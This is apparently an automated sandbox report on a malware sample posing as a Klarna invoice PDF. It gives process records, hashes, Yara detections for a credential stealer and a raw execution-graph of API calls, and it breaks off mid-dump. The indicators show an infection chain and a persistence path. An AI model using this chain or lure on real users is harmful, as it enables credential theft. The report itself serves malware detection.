                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:08:59:08
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
                                                                                                                                                                                                                                              Imagebase:0x7ff686a00000
                                                                                                                                                                                                                                              File size:5'641'176 bytes
                                                                                                                                                                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:08:59:10
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                                                                              Imagebase:0x7ff6413e0000
                                                                                                                                                                                                                                              File size:3'581'912 bytes
                                                                                                                                                                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:08:59:10
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff6413e0000
                                                                                                                                                                                                                                              File size:3'581'912 bytes
                                                                                                                                                                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:08:59:19
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\TCUINOVJ.exe"
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              File size:4'151'808 bytes
                                                                                                                                                                                                                                              MD5 hash:38F517307990F8B2F9CEB8DE5BD1A528
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:08:59:21
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\iScrPaint.exe"
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              File size:1'909'504 bytes
                                                                                                                                                                                                                                              MD5 hash:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:08:59:23
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              File size:1'909'504 bytes
                                                                                                                                                                                                                                              MD5 hash:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:08:59:24
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:08:59:24
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:08:59:43
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              Imagebase:0xc00000
                                                                                                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 000001C397AC0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000003.2665226023.000001C397AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C397AC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1c397ac0000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction ID: e2c5569f1b438eb97a90017bc84e4a54c5f7b4429757018b144fc799ee11e6c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 329002154D550665E41515950C8569D90446389354FD884804426D4284D49D43D65196
                                                                                                                                                                                                                                                Function 000001C397AC0FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000003.2665226023.000001C397AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C397AC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1c397ac0000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction ID: e2c5569f1b438eb97a90017bc84e4a54c5f7b4429757018b144fc799ee11e6c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 329002154D550665E41515950C8569D90446389354FD884804426D4284D49D43D65196
                                                                                                                                                                                                                                                Function 000001C397AC0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000003.2665226023.000001C397AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C397AC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1c397ac0000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction ID: e2c5569f1b438eb97a90017bc84e4a54c5f7b4429757018b144fc799ee11e6c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 329002154D550665E41515950C8569D90446389354FD884804426D4284D49D43D65196

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:17.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:25.9%
                                                                                                                                                                                                                                                Total number of Nodes:1474
                                                                                                                                                                                                                                                Total number of Limit Nodes:20
                                                                                                                                                                                                                                                execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 